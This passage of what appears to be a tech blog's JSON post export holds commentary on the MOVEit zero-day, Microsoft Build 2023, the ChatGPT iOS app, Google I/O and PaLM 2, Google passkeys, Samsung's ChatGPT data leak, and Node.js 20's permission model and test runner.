frameworks. 
The fact that it\u0026rsquo;s still appearing in enterprise software handling sensitive data in 2023 reflects a fundamental failure in software quality and security investment.\nFor organizations evaluating their file transfer infrastructure, the question isn\u0026rsquo;t just \u0026ldquo;is our current product patched?\u0026rdquo; It\u0026rsquo;s \u0026ldquo;does our file transfer architecture minimize the blast radius of a compromise?\u0026rdquo; This means thinking about segmentation — can your MFT solution access all your sensitive data, or is it limited to specific transfer jobs? It means thinking about monitoring — are you logging and alerting on unusual data access patterns? And it means thinking about alternatives — do you actually need a centralized MFT solution, or could you use more modern, segmented approaches to file transfer?\nMy Take # Every time one of these MFT vulnerabilities drops, I have the same conversation with colleagues: \u0026ldquo;Why are we still running these things?\u0026rdquo; The answer is always the same — inertia, compliance requirements, partner dependencies, and the sheer difficulty of migrating file transfer workflows that have been running for years.\nBut the risk calculus is changing. Three major MFT zero-days in three years, each resulting in mass exploitation and data theft, should be a wake-up call. If your organization is running MOVEit Transfer, GoAnywhere, or similar legacy MFT products, now is the time to start a serious evaluation of your options — not just patching and moving on until the next zero-day drops.\nIn the short term, patch now. Investigate for compromise. Review your network segmentation around MFT infrastructure. In the longer term, start the conversation about whether your file transfer architecture needs a fundamental rethink. 
The attackers have clearly identified MFT solutions as high-value targets, and they\u0026rsquo;re not going to stop.\n","date":"1 June 2023","externalUrl":null,"permalink":"/posts/230601-moveit-zero-day-supply-chain-nightmare/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A critical zero-day in Progress MOVEit Transfer is being actively exploited, and the scope of the damage is still emerging.","title":"MOVEit Transfer Zero-Day — Another Supply Chain Nightmare Unfolds","type":"posts"},{"content":"Microsoft Build 2023 just concluded, and after watching the keynotes and digging through the session catalog, one thing is clear: Microsoft is not treating AI as a feature. They\u0026rsquo;re treating it as the platform. Satya Nadella used the phrase \u0026ldquo;Copilot stack\u0026rdquo; repeatedly, describing a layered architecture for building AI-powered applications. Having worked with Azure in various capacities over the years, this feels like the most significant strategic pivot since the original cloud push under Nadella\u0026rsquo;s leadership.\nThe Copilot Stack Explained # The Copilot Stack is Microsoft\u0026rsquo;s framework for how AI applications should be architected. From bottom to top: infrastructure (Azure AI compute), foundation models (OpenAI models via Azure), an AI orchestration layer (centered on Semantic Kernel and prompt management), data grounding (connecting models to your specific data via embeddings and retrieval), and finally the Copilot user experience layer.\nWhat makes this interesting from a DevOps and infrastructure perspective is the orchestration layer. Microsoft is pushing Semantic Kernel — their open-source SDK for integrating LLMs into applications — as the standard way to build AI-augmented workflows. 
If you\u0026rsquo;ve been using LangChain, Semantic Kernel is Microsoft\u0026rsquo;s answer, with tighter Azure integration and a more opinionated architecture.\nThe plugin system is the other major piece. Microsoft announced that ChatGPT plugins and Bing plugins will be interoperable with Microsoft 365 Copilot. Build a plugin once, and it can surface across ChatGPT, Bing, and the entire Microsoft 365 suite. For enterprise developers, this cross-platform plugin story is genuinely compelling — you don\u0026rsquo;t want to build and maintain separate integrations for every AI surface. This architectural pattern presaged how AI agents would eventually consolidate.\nAzure AI Infrastructure Updates # For teams running AI workloads in production, Build brought several meaningful infrastructure announcements. Azure AI Studio is a new unified portal for building generative AI applications, combining model deployment, prompt engineering, and evaluation tools in one interface.\nThe most practically useful announcement for my work is the Azure OpenAI Service updates. GPT-4 is now generally available on Azure, with enterprise features that the direct OpenAI API doesn\u0026rsquo;t offer: virtual network support, managed identity authentication, content filtering, and data residency guarantees. These infrastructure concerns became even more central as AI governance frameworks like the EU AI Act emerged. If you\u0026rsquo;ve been hesitant about using OpenAI\u0026rsquo;s API for production enterprise workloads due to compliance concerns, Azure\u0026rsquo;s wrapper addresses most of those issues.\nThere\u0026rsquo;s also Prompt Flow, a new tool for building, evaluating, and deploying prompt-based applications. It integrates with Azure DevOps and GitHub Actions for CI/CD of AI applications. 
The idea of having automated testing for prompt quality in your deployment pipeline is something I\u0026rsquo;ve been implementing manually — having platform support for this is welcome.\nDev Tools: GitHub Copilot Chat and Dev Home # GitHub Copilot Chat is moving out of private preview into public preview. Unlike the original Copilot inline completion, Chat provides a conversational interface within VS Code and Visual Studio for asking questions about your codebase, generating tests, explaining code, and suggesting fixes for errors.\nI\u0026rsquo;ve been using the original Copilot for over a year now, and the chat interface adds a genuinely different dimension. Inline completions are great for the \u0026ldquo;I know what I want to write\u0026rdquo; flow. Chat is better for the \u0026ldquo;I\u0026rsquo;m not sure how to approach this\u0026rdquo; flow. Having both available in the same editor is a productivity multiplier.\nMicrosoft also announced Dev Home, a new Windows application for developer machine setup. It connects to GitHub, manages development environments, and provides a dashboard for monitoring projects. It\u0026rsquo;s open source and extensible. After spending too many hours of my career setting up development environments on new machines, anything that streamlines that process gets my attention.\nFabric and the Data Platform Story # Microsoft Fabric is a unified analytics platform that merges Power BI, Azure Synapse, and Azure Data Factory into a single SaaS product. While this might seem tangential to the AI story, it\u0026rsquo;s actually central — the \u0026ldquo;data grounding\u0026rdquo; layer of the Copilot Stack depends on having your organizational data accessible, indexed, and embeddings-ready.\nFabric introduces a lakehouse architecture with OneLake, a single unified data lake for the entire organization. Every Fabric workload — data engineering, data warehousing, real-time analytics, data science — works against the same underlying storage. 
The AI integration comes through Copilot in Fabric, which can generate data pipelines, write SQL queries, and create Power BI reports from natural language descriptions.\nMy Take # What impresses me about Microsoft\u0026rsquo;s Build announcements isn\u0026rsquo;t any single product — it\u0026rsquo;s the coherence of the overall platform story. Google I/O last week felt like \u0026ldquo;we added AI to everything.\u0026rdquo; Build feels like \u0026ldquo;we designed a platform for building AI applications, and here\u0026rsquo;s how every piece fits together.\u0026rdquo; This platform thinking continues to evolve, as evidenced by later cloud innovations and infrastructure consolidation.\nThe Copilot Stack architecture is the most clear-headed framework I\u0026rsquo;ve seen for thinking about AI application development. The separation between foundation models, orchestration, data grounding, and UX mirrors how well-architected traditional applications separate concerns — and it gives teams clear layers to work on independently.\nFrom a practical standpoint, if you\u0026rsquo;re an Azure shop, the path to building AI-powered applications just got significantly smoother. The Azure OpenAI Service with enterprise controls, Semantic Kernel for orchestration, Prompt Flow for testing, and Azure DevOps integration for CI/CD creates a complete pipeline. If you\u0026rsquo;re not an Azure shop, this level of platform integration is worth evaluating whether you should be.\nThe competitive dynamics are fascinating. Microsoft has the enterprise distribution, the OpenAI partnership for models, and the developer tools with GitHub and VS Code. That\u0026rsquo;s a formidable combination that neither Google nor AWS can fully match right now. 
The next year is going to be intense.\n","date":"25 May 2023","externalUrl":null,"permalink":"/posts/230525-microsoft-build-2023-copilot-stack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft Build 2023 reveals the ‘Copilot Stack’ — a layered architecture that shows how Microsoft plans to embed AI into every developer workflow.","title":"Microsoft Build 2023 — The Copilot Stack and Azure AI's Big Bet","type":"posts"},{"content":"OpenAI just released the official ChatGPT app for iOS, and while it might seem like a straightforward mobile port, this is actually a significant strategic move. Following ChatGPT\u0026rsquo;s explosive growth and the API\u0026rsquo;s democratization, this mobile app represents the next phase of consumer adoption. After months of third-party ChatGPT wrappers flooding the App Store — many of them charging subscription fees for what amounts to an API wrapper with a markup — OpenAI is taking direct control of the mobile experience. And the implications for developers are more interesting than they might appear at first glance.\nMore Than a Mobile Port # The app itself is polished. It syncs your conversation history across devices, supports voice input through Whisper (OpenAI\u0026rsquo;s speech recognition model), and gives ChatGPT Plus subscribers access to GPT-4. The voice input integration is the standout feature — it\u0026rsquo;s fast, accurate, and makes the interaction feel genuinely different from typing into a chat box on desktop.\nWhat caught my attention as a developer is the Whisper integration. This isn\u0026rsquo;t using Apple\u0026rsquo;s built-in speech recognition. OpenAI is routing voice through their own model, which means they\u0026rsquo;re building a full multimodal input pipeline on mobile. 
If you\u0026rsquo;ve worked with speech-to-text APIs, you know the quality difference between on-device recognition and a dedicated ML model can be substantial, especially for technical terminology.\nThe app is free to use with GPT-3.5, with GPT-4 access reserved for Plus subscribers at $20/month. This pricing structure is interesting — it\u0026rsquo;s essentially a freemium mobile app backed by some of the most expensive infrastructure in tech. As we\u0026rsquo;d seen with the ChatGPT API\u0026rsquo;s aggressive pricing, OpenAI is clearly prioritizing user acquisition over short-term revenue here.\nThe Third-Party App Problem # Before this launch, searching \u0026ldquo;ChatGPT\u0026rdquo; in the App Store was an exercise in frustration. Dozens of apps with similar names and icons, many charging $7.99/week for subscriptions, most just wrapping the API with minimal added value. Some were outright scams. Apple had started cracking down, but the damage to user trust was real.\nOpenAI\u0026rsquo;s direct entry solves this in the most decisive way possible. It also signals something about the platform dynamics of AI — the model providers are going to want to own the user relationship. Just as Google eventually decided it needed to make its own phones to fully control the Android experience, OpenAI is deciding it can\u0026rsquo;t leave the mobile user experience to third parties.\nFor developers who built legitimate ChatGPT wrapper apps, this is a difficult moment. Some had built real businesses with features like prompt libraries, conversation organization, and workflow integrations. They now need to either differentiate significantly or pivot. 
It\u0026rsquo;s a pattern I\u0026rsquo;ve seen play out dozens of times — platform owners eventually subsume the most popular third-party use cases.\nVoice as Interface: The Developer Angle # The Whisper integration points toward something I think developers should be paying close attention to: voice is becoming a first-class interface for AI interactions. On a phone, typing long prompts is cumbersome. Speaking is natural. And if the AI can understand you accurately — including code-related terminology — the interaction model changes fundamentally.\nI spent an afternoon testing the voice input with various technical queries. Things like \u0026ldquo;explain the difference between a mutex and a semaphore\u0026rdquo; or \u0026ldquo;write a Python function that implements binary search\u0026rdquo; came through cleanly. It\u0026rsquo;s not perfect — specialized library names sometimes get mangled — but it\u0026rsquo;s remarkably good for a first release.\nThis has implications for how we think about building AI-powered tools. If voice becomes a primary input modality, the prompt engineering patterns we\u0026rsquo;ve developed for text may need adaptation. Spoken language is inherently less structured than typed text, which means the models need to be more tolerant of ambiguity and conversational filler.\nThe Platform Race Heats Up # This launch comes just a week after Google I/O, where Google announced major AI upgrades across its product lineup. Microsoft has been integrating GPT-4 into Bing and Office. And now OpenAI is going directly to consumers on mobile. The race for AI mindshare is entering a new phase. This competitive pressure would accelerate through the DevDay announcements and GPT-4 Turbo.\nFor those of us in the development community, the interesting question is what this means for the API business. OpenAI\u0026rsquo;s API revenue from developers is substantial, but consumer subscriptions could dwarf it if ChatGPT reaches mainstream mobile adoption. 
Will OpenAI continue to prioritize the developer API, or will consumer features start getting preferential treatment?\nThe history of platform companies suggests consumer will win when there\u0026rsquo;s a conflict. But OpenAI\u0026rsquo;s unique position — needing enterprise and developer revenue to fund the massive compute costs of training frontier models — might keep the API business as a genuine priority. I hope so, because the API is where the real innovation is happening.\nMy Take # I\u0026rsquo;ve been building software long enough to recognize a platform inflection point. The ChatGPT iOS app isn\u0026rsquo;t just about putting a chatbot on phones — it\u0026rsquo;s about establishing AI as a mobile-native interaction paradigm. When voice input works this well combined with a capable language model, you start to see a future where natural language becomes a genuine computing interface, not just a novelty.\nFor developers, my advice is straightforward: start thinking about voice-first AI interactions in your applications. The Whisper API is excellent and reasonably priced. The ChatGPT app will normalize the expectation that AI tools should work on mobile with voice input. Your users are going to start expecting the same from your products.\nAnd if you\u0026rsquo;re currently wrapping the ChatGPT API in a mobile app without significant differentiation — well, it\u0026rsquo;s time to find your unique value proposition. 
The platform owner just showed up, and they brought Whisper with them.\n","date":"18 May 2023","externalUrl":null,"permalink":"/posts/230518-chatgpt-ios-app-ai-goes-mobile/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI launches the official ChatGPT iOS app, marking AI’s shift from desktop curiosity to mobile-first tool.","title":"ChatGPT Comes to iOS — When AI Goes Mobile-First","type":"posts"},{"content":"Google I/O just wrapped up, and if you blinked you might have missed it — the word \u0026ldquo;AI\u0026rdquo; was mentioned over a hundred times during the keynote. This wasn\u0026rsquo;t a developer conference with some AI sprinkled on top. This was an AI conference that happened to be at Google I/O. Having watched these events for decades, I can tell you: Google is scared, and that fear is producing some genuinely impressive engineering.\nPaLM 2: The Foundation # The headline announcement is PaLM 2, Google\u0026rsquo;s next-generation large language model. What\u0026rsquo;s interesting isn\u0026rsquo;t just the model itself — it\u0026rsquo;s the strategy. Google announced four sizes: Gecko, Otter, Bison, and Unicorn. Gecko is small enough to run on mobile devices, which tells you everything about where Google thinks this is heading.\nPaLM 2 powers over 25 Google products now, including the upgraded Bard. The technical improvements are notable: better multilingual capabilities across over 100 languages, improved reasoning, and significantly better coding abilities. Google claims it was trained on a dataset that included a much larger proportion of multilingual text and source code compared to PaLM 1.\nFrom a developer perspective, the PaLM API is now generally available through Google Cloud\u0026rsquo;s Vertex AI platform. The MakerSuite tool for rapid prototyping is a clear play to capture developers who are currently flocking to the OpenAI API. 
Having spent a few hours with the documentation already, the developer experience feels more polished than I expected.\nBard Gets Serious # Let\u0026rsquo;s be honest — when Google launched Bard in March, it felt rushed. The demo famously included a factual error, and the product itself was underwhelming compared to ChatGPT. Two months later, Bard is getting a significant upgrade powered by PaLM 2.\nThe most interesting additions are the visual capabilities. Bard can now accept images as input (powered by Google Lens integration), and it\u0026rsquo;s getting integrations with Google Sheets, Maps, and other Workspace products. Google also announced Bard would support coding assistance in over 20 programming languages, with the ability to export code directly to Google Colab.\nWhat I find strategically significant is the Workspace integration. This is Google leveraging its existing distribution advantage — hundreds of millions of Workspace users who could get AI capabilities without switching platforms. It\u0026rsquo;s the same playbook Microsoft is running with Copilot, and it\u0026rsquo;s going to make the next twelve months very interesting.\nDuet AI: The Enterprise Play # Buried beneath the consumer announcements was something that should matter a lot more to those of us building software professionally. Duet AI for Google Cloud is Google\u0026rsquo;s answer to GitHub Copilot and Amazon CodeWhisperer.\nDuet AI promises code completion, generation, and chat-based assistance directly within Google Cloud\u0026rsquo;s IDE integrations. It also extends to infrastructure — helping write Terraform configurations, troubleshoot GKE clusters, and manage Cloud SQL databases through natural language.\nI\u0026rsquo;ve been running workloads on Google Cloud for several projects, and the infrastructure assistance angle is genuinely compelling. 
Anyone who\u0026rsquo;s ever wrestled with IAM policies or VPC networking configurations knows that context-aware suggestions could save hours of documentation diving. The question is whether Google can deliver on the execution — they have a habit of announcing impressive products at I/O that take a year to become genuinely useful.\nThe Broader Platform Shift # What struck me most about this I/O wasn\u0026rsquo;t any single announcement — it was the totality. Every single product team at Google seems to have been given the mandate to integrate AI. Android 14 gets AI-generated wallpapers. Google Photos gets a \u0026ldquo;Magic Editor\u0026rdquo; powered by generative AI. Google Maps gets \u0026ldquo;Immersive View\u0026rdquo; routes using AI and Street View data.\nFor developers, this means the Google Cloud Platform is making a very aggressive play to be the default AI development platform. The combination of PaLM 2 API access, Vertex AI\u0026rsquo;s MLOps tooling, Duet AI for development assistance, and TPU v5e for training creates a full-stack AI development environment that directly competes with Azure OpenAI and AWS Bedrock.\nMy Take # I\u0026rsquo;ve been skeptical about Google\u0026rsquo;s ability to translate research excellence into product execution. They invented the Transformer architecture, after all, and then watched OpenAI run away with the market. But this I/O felt different. There\u0026rsquo;s an urgency that wasn\u0026rsquo;t there before, and the PaLM 2 technical improvements suggest the research teams are finally getting the product support they need.\nThe developer tooling play is smart. If Google can capture even a fraction of the developers currently building on OpenAI\u0026rsquo;s API by offering competitive models with better cloud integration, the economics could shift quickly. 
PaLM 2\u0026rsquo;s multi-size approach — especially Gecko for on-device inference — also addresses a real gap that OpenAI hasn\u0026rsquo;t filled yet.\nThat said, I\u0026rsquo;d temper expectations. Google announced a lot today, and historically they ship about 60% of what they announce at I/O. The proof will be in the execution over the coming months. For now, though, the AI race just got meaningfully more competitive, and that\u0026rsquo;s good for all of us building software.\n","date":"11 May 2023","externalUrl":null,"permalink":"/posts/230511-google-io-2023-palm2-ai-platform/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google I/O 2023 puts AI front and center with PaLM 2, signaling a massive platform shift across Search, Workspace, and Cloud.","title":"Google I/O 2023 — PaLM 2 and the AI Platform Play","type":"posts"},{"content":"Yesterday, on World Password Day of all days, Google announced that passkeys are now available as a sign-in option for all Google Accounts. This isn\u0026rsquo;t a beta or a limited rollout — it\u0026rsquo;s 1.5 billion accounts gaining access to passwordless authentication built on the FIDO2/WebAuthn standard. After years of the security community talking about killing passwords, this feels like the moment it actually starts happening.\nWhat Passkeys Are (and Aren\u0026rsquo;t) # For those who haven\u0026rsquo;t been following the FIDO Alliance\u0026rsquo;s work, passkeys are cryptographic credentials that replace passwords entirely. When you create a passkey for a site, your device generates a public-private key pair. The public key goes to the server; the private key stays on your device, protected by your screen lock (fingerprint, face recognition, or PIN).\nAuthentication works via a challenge-response protocol: the server sends a challenge, your device signs it with the private key after biometric verification, and the server validates the signature against the stored public key. 
The private key never leaves your device. There\u0026rsquo;s nothing to phish, nothing to leak in a database breach, nothing to reuse across sites.\nPasskeys build on the WebAuthn standard that\u0026rsquo;s been in browsers since 2019, but with a critical addition: syncing. Unlike hardware security keys (YubiKeys and the like), passkeys sync across your devices via your platform\u0026rsquo;s cloud — iCloud Keychain for Apple devices, Google Password Manager for Android and Chrome, and eventually Windows Hello for Microsoft\u0026rsquo;s ecosystem. This solves the biggest usability problem with previous FIDO implementations: losing your authenticator no longer means losing access.\nWhy This Matters More Than Previous Attempts # We\u0026rsquo;ve been trying to kill passwords for as long as I\u0026rsquo;ve been in this industry. Smart cards in the 90s, client certificates, various biometric schemes, FIDO U2F keys — all technically superior to passwords, all failed to achieve mainstream adoption. So why should passkeys be different?\nDevice support is already here. Passkeys work today on iOS 16+, Android 9+, macOS Ventura, and Windows 10/11 with the latest browser versions. That covers the vast majority of consumer devices without requiring any additional hardware.\nThe UX is genuinely better. I\u0026rsquo;ve been using passkeys on a few services for the past few months, and the experience is markedly faster than passwords. No typing, no password manager lookup, no 2FA code. Touch your fingerprint sensor and you\u0026rsquo;re in. For the first time, the secure option is also the most convenient option — and that\u0026rsquo;s the only way security wins at scale.\nThe big platforms are aligned. Apple, Google, and Microsoft are all committed to passkeys through the FIDO Alliance. When these three companies agree on an authentication standard and ship it in their platforms, adoption follows. 
This isn\u0026rsquo;t a niche security vendor trying to push a proprietary solution — it\u0026rsquo;s the infrastructure layer making passwords obsolete.\nImplementation Considerations for Developers # If you\u0026rsquo;re building applications that handle user authentication, it\u0026rsquo;s time to start planning passkey support. Here\u0026rsquo;s what I\u0026rsquo;ve learned from early implementation work:\nThe WebAuthn API is well-designed but has nuances. The browser API for creating and using passkeys is navigator.credentials.create() and navigator.credentials.get(). The specification is solid, but you\u0026rsquo;ll want a server-side library to handle attestation and assertion validation. Libraries like SimpleWebAuthn (JavaScript) or py_webauthn (Python) abstract the complexity.\nYou\u0026rsquo;ll need a migration strategy. You can\u0026rsquo;t flip a switch and require passkeys — you need a period where both passwords and passkeys work. Design your auth flow to prompt users to create a passkey after successful password login, and gradually nudge them toward passkey-only over time.\nAccount recovery is the hard problem. What happens when a user loses all their devices? With passwords, you send a reset email. With passkeys, the platform sync should handle device loss in most cases, but you still need a recovery path. Google\u0026rsquo;s approach includes recovery through phone number, another signed-in device, or a hardware security key. Design your recovery flow before shipping passkeys.\nThink about enterprise scenarios. Managed devices, shared workstations, and compliance requirements add complexity. FIDO2 supports attestation that lets you verify the type of authenticator being used — important if your security policy requires specific hardware.\nThe Road Ahead # Google\u0026rsquo;s rollout is a massive catalyst, but we\u0026rsquo;re still early. 
The adoption curve will look something like this:\nNow: Major platforms offer passkey sign-in alongside passwords Next 12-18 months: More services adopt passkeys; password managers integrate passkey support 2-3 years: Password-optional accounts become common on major services 5+ years: Password-only sign-in starts disappearing from mainstream services The wildcard is the cross-platform story. Right now, syncing works within ecosystems (Apple-to-Apple, Google-to-Google), but cross-platform passkey management is still evolving. If I create a passkey on my iPhone, using it on a Windows PC requires scanning a QR code for a cross-device authentication flow. It works, but it\u0026rsquo;s not as seamless as staying within one ecosystem. I expect this to improve significantly as the standards mature.\nMy Take # I\u0026rsquo;ve been advocating for WebAuthn adoption since the spec was finalized, and Google\u0026rsquo;s move is the best news I\u0026rsquo;ve seen for authentication security in years. Passwords are a fundamentally broken paradigm — they\u0026rsquo;re the single biggest attack vector for account compromise, and no amount of complexity requirements or rotation policies fixes the underlying problem.\nPasskeys aren\u0026rsquo;t perfect. The reliance on platform vendors for key syncing introduces its own trust considerations. The cross-platform experience needs work. Enterprise deployment scenarios are still being figured out. But these are tractable engineering problems, not fundamental design flaws.\nIf you\u0026rsquo;re a developer, add WebAuthn support to your roadmap. If you\u0026rsquo;re a user, go to g.co/passkeys and set up a passkey for your Google Account today. The best way to build momentum for passwordless authentication is to use it.\nWe\u0026rsquo;ve been talking about killing passwords for 30 years. 
This time, I think we actually have the right technology, the right ecosystem support, and the right user experience to make it happen.\nThis post is part of my Security in Practice series, tracking real-world security developments that matter for working engineers.\n","date":"4 May 2023","externalUrl":null,"permalink":"/posts/230504-google-passkeys-passwords-future/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google enables passkey sign-in for all Google Accounts, marking the most significant push yet toward a passwordless future built on FIDO2 and WebAuthn.","title":"Google Rolls Out Passkeys — The Beginning of the End for Passwords","type":"posts"},{"content":"The news broke this week that Samsung semiconductor employees leaked confidential data through ChatGPT on at least three separate occasions within a span of just 20 days. Engineers pasted proprietary source code to get debugging help, shared internal meeting notes for summarization, and submitted semiconductor test data for analysis. Samsung has since restricted internal ChatGPT use and is reportedly developing its own in-house AI tool. This story encapsulates a problem that every organization using — or trying to prevent the use of — LLM services needs to confront head-on.\nWhat Actually Happened # According to Korean media outlet Economist Korea, the leaks occurred shortly after Samsung\u0026rsquo;s semiconductor division lifted an earlier ban on ChatGPT. Three incidents were reported:\nAn engineer pasted proprietary source code into ChatGPT to check for bugs Another employee submitted code related to semiconductor equipment to optimize it A third recorded an internal meeting, transcribed it, and fed it to ChatGPT for meeting minutes In each case, the employees were using ChatGPT as a productivity tool — the same way millions of developers and knowledge workers are using it right now. 
The problem is that anything submitted to ChatGPT through the standard interface can be used by OpenAI for model training, and there\u0026rsquo;s no mechanism to retrieve or delete that data after submission.\nSamsung\u0026rsquo;s response was swift: restrict ChatGPT usage to prompts under 1,024 bytes (effectively making it useless for code tasks), threaten disciplinary action for future violations, and accelerate development of an internal alternative.\nThe Systemic Problem # Samsung isn\u0026rsquo;t unique here. They\u0026rsquo;re just the first major company to have their internal AI mishap become public. I\u0026rsquo;d wager that similar incidents are happening at thousands of companies right now, most of them undetected.\nThe fundamental issue is a collision between two forces:\nDeveloper productivity gains are real. ChatGPT and similar tools genuinely make people more productive. The Samsung engineers weren\u0026rsquo;t being negligent for fun — they were trying to do their jobs better and faster. When you\u0026rsquo;re staring at a bug at 11 PM, the temptation to paste your code into the best debugging assistant ever created is enormous.\nData governance hasn\u0026rsquo;t caught up. Most organizations\u0026rsquo; data classification and handling policies were written for a world where the primary risks were email attachments and USB drives. They don\u0026rsquo;t account for a scenario where an employee can exfiltrate sensitive data with a browser tab and good intentions.\nThis creates a shadow IT problem of unprecedented scale. Even if your company has an official policy prohibiting ChatGPT use, how do you enforce it? The service runs in a browser. There\u0026rsquo;s no installable client to block. You can restrict the domain at the network level, but employees have phones. 
And if you\u0026rsquo;re too heavy-handed with restrictions, your engineers will just use it at home on their personal devices — with less oversight, not more.\nBuilding an Enterprise AI Policy That Works # Based on conversations I\u0026rsquo;ve been having with CISOs and engineering leaders, here\u0026rsquo;s what a pragmatic approach looks like:\nClassify your data explicitly. Engineers need to know, in concrete terms, what can and cannot be shared with external AI services. \u0026ldquo;Confidential data\u0026rdquo; is too vague. Define it: source code from repositories X, Y, Z — never. Internal documentation — never. Public API documentation — acceptable. Stack traces with identifiers stripped — acceptable with review.\nProvide sanctioned alternatives. Banning ChatGPT without providing an alternative is like banning Stack Overflow — people will find workarounds. The better approach is to offer approved tools with proper data handling. OpenAI\u0026rsquo;s API with the data usage opt-out, Azure OpenAI Service with enterprise data protection, or self-hosted models like those based on LLaMA are all viable options depending on your sensitivity requirements.\nImplement technical controls where possible. DLP (Data Loss Prevention) tools can be configured to flag or block submissions to known AI service domains. Browser extensions can intercept paste events on certain sites. These aren\u0026rsquo;t foolproof, but they add friction that reduces accidental exposure.\nTrain your people. The Samsung engineers likely had no idea their prompts could be used for training. A 30-minute security awareness session specifically about AI tool risks would have prevented all three incidents.\nThe Broader Implications # This incident is accelerating a trend I\u0026rsquo;ve been watching: the enterprise AI stack is going to look very different from the consumer AI stack. 
Companies with serious IP concerns — semiconductor, pharma, defense, finance — are going to demand:\nOn-premises or VPC-deployed models where data never leaves their infrastructure Contractual guarantees that prompt data isn\u0026rsquo;t used for training Audit trails showing what data was submitted and by whom Model isolation ensuring their fine-tuned models aren\u0026rsquo;t accessible to other customers OpenAI\u0026rsquo;s enterprise offerings, Azure OpenAI Service, and the emerging open-source model ecosystem are all responses to this demand. But we\u0026rsquo;re still in the early days of figuring out the right architecture and governance model.\nMy Take # I have sympathy for those Samsung engineers. They did what any curious, productivity-minded developer would do — they used the best tool available to solve their immediate problem. The failure isn\u0026rsquo;t individual; it\u0026rsquo;s organizational. If your security policy can be violated by a well-meaning employee using a browser, your policy is insufficient.\nThe answer isn\u0026rsquo;t to ban AI tools. That ship has sailed. The answer is to build infrastructure and policies that let your team use AI productively without putting your IP at risk. 
That means investing in self-hosted models, deploying enterprise-grade AI services with proper data handling, and treating AI governance as a first-class security concern — not an afterthought.\nEvery engineering leader should be asking right now: \u0026ldquo;If my team is using ChatGPT — and they probably are — what data have they already shared?\u0026rdquo; The answer might be uncomfortable, but it\u0026rsquo;s better to find out on your own terms than to read about it in the press.\nThis post is part of my Security in Practice series, exploring real-world security challenges in software engineering.\n","date":"27 April 2023","externalUrl":null,"permalink":"/posts/230427-samsung-chatgpt-data-leak/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Samsung employees accidentally leaked proprietary source code and meeting notes via ChatGPT, exposing the urgent need for enterprise AI usage policies.","title":"Samsung's ChatGPT Data Leak — A Wake-Up Call for Enterprise AI Governance","type":"posts"},{"content":"Node.js 20 was released on April 18, and as someone who\u0026rsquo;s been building on Node since the early days (version 0.10, if you\u0026rsquo;re keeping score), this release tells an interesting story about where the runtime is heading. There are no headline-grabbing features that\u0026rsquo;ll set Twitter on fire, but the additions reflect a platform that\u0026rsquo;s growing up in exactly the right ways.\nThe Permission Model: Finally # The feature I\u0026rsquo;m most excited about is the experimental permission model. Launched behind the --experimental-permission flag, it allows you to restrict what a Node.js process can access: file system reads and writes, child process spawning, and worker thread creation.\nnode --experimental-permission --allow-fs-read=/app/data --allow-fs-write=/app/logs app.js This is a significant security improvement. 
For years, one of the legitimate criticisms of Node.js (and npm in particular) has been the supply chain risk: a single malicious dependency can read your filesystem, spawn processes, or exfiltrate data. With the permission model, you can constrain what the runtime itself is allowed to do, adding a layer of defense-in-depth that doesn\u0026rsquo;t depend on trusting every transitive dependency.\nIt\u0026rsquo;s still experimental, and the granularity isn\u0026rsquo;t as fine as Deno\u0026rsquo;s permission system (which has had this from day one — credit where it\u0026rsquo;s due). But the fact that Node.js is adopting this pattern validates what Ryan Dahl identified as a design flaw in his famous \u0026ldquo;10 Things I Regret About Node.js\u0026rdquo; talk. Better late than never, and the Node team\u0026rsquo;s implementation benefits from learning what works in practice.\nTest Runner Goes Stable # The built-in test runner, introduced experimentally in Node.js 18, is now marked as stable. This is a bigger deal than it might seem. For years, the Node.js testing story has been \u0026ldquo;pick a framework\u0026rdquo; — Mocha, Jest, Vitest, Ava, Tap — each with its own configuration, assertion style, and ecosystem. Having a zero-dependency test runner built into the runtime reduces friction significantly, especially for smaller projects and libraries.\nimport { describe, it } from \u0026#39;node:test\u0026#39;; import assert from \u0026#39;node:assert/strict\u0026#39;; describe(\u0026#39;Array\u0026#39;, () =\u0026gt; { it(\u0026#39;should return -1 when value is not present\u0026#39;, () =\u0026gt; { assert.equal([1, 2, 3].indexOf(4), -1); }); }); The API is clean and familiar. It supports describe/it blocks, beforeEach/afterEach hooks, subtests, mocking, code coverage via --experimental-test-coverage, and watch mode. 
It\u0026rsquo;s not going to replace Jest for complex frontend testing setups anytime soon, but for backend services and libraries, it\u0026rsquo;s increasingly compelling.\nI\u0026rsquo;ve started using it on a few internal tools, and the startup time alone — no Jest configuration parsing, no Babel transforms — makes it noticeably faster for small test suites.\nV8 11.3 and Performance # Node.js 20 ships with V8 11.3, which brings several quality-of-life improvements:\nString.prototype.isWellFormed() and toWellFormed() — Useful for handling strings that might contain lone surrogates, a common source of subtle bugs in text processing. Array.prototype changes — Copying methods like toSorted(), toReversed(), toSpliced(), and with() return a new array instead of mutating the original, and continue to modernize the standard library. Improved regular expression performance — V8\u0026rsquo;s regex engine continues to get faster, which matters for any application doing significant text parsing. V8 is also working on Maglev, a new mid-tier optimizing compiler that sits between Sparkplug (the baseline compiler) and TurboFan (the full optimizing compiler). It is not enabled by default in Node.js 20, but once it is, the practical impact should be faster startup times and improved performance for code that runs moderately often — not hot enough for TurboFan to kick in, but frequent enough to benefit from optimization beyond the baseline.\nThe Bigger Picture: Node.js in 2023 # Stepping back, Node.js 20 reflects a runtime that\u0026rsquo;s shifted from \u0026ldquo;move fast and add features\u0026rdquo; to \u0026ldquo;mature, harden, and refine.\u0026rdquo; The permission model addresses security. The stable test runner reduces external dependencies. Performance improvements are incremental but consistent.\nThis is exactly what I want from a platform I\u0026rsquo;m running in production. The days of major breaking changes and the drama around --harmony flags feel like ancient history. 
